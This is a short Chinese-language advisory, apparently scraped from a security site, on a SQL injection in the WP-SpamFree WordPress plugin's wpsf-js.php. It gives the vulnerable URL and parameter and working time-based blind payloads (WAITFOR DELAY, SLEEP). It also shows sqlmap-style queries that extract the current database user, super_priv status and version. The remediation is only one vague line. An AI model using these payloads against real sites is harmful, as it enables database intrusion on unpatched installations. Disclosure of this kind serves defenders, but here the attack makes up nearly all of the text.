标题:[ WordPress wpsf-js plugin, SQL Injection] 作者: [cheki] HdhCmsTest2cto测试数据 影响版本:[3.2.1] 测试平台:[linux] 工具: ["sqlmap"] #SQL注射 http://HdhCmsTest2cto测试数据 /wp-content/plugins/wp-spamfree/js/wpsf-js.php?id=1 测试:id=-1; WAITFOR DELAY '0:0:5';-- or id=-1 AND SLEEP(5) #[http://HdhCmsTest2cto测试数据 :80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][CURRENT_USER() #http://HdhCmsTest2cto测试数据 :80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][SELECT (CASE WHEN ((SELECT super_priv FROM mysql .user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END) #http://HdhCmsTest2cto测试数据 :80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][MID((VERSION()),1,6) 修复:过滤相应页面
查看更多关于WP-SpamFree WordPress Spam插件SQL注射缺陷及修复 - 网站的详细内容...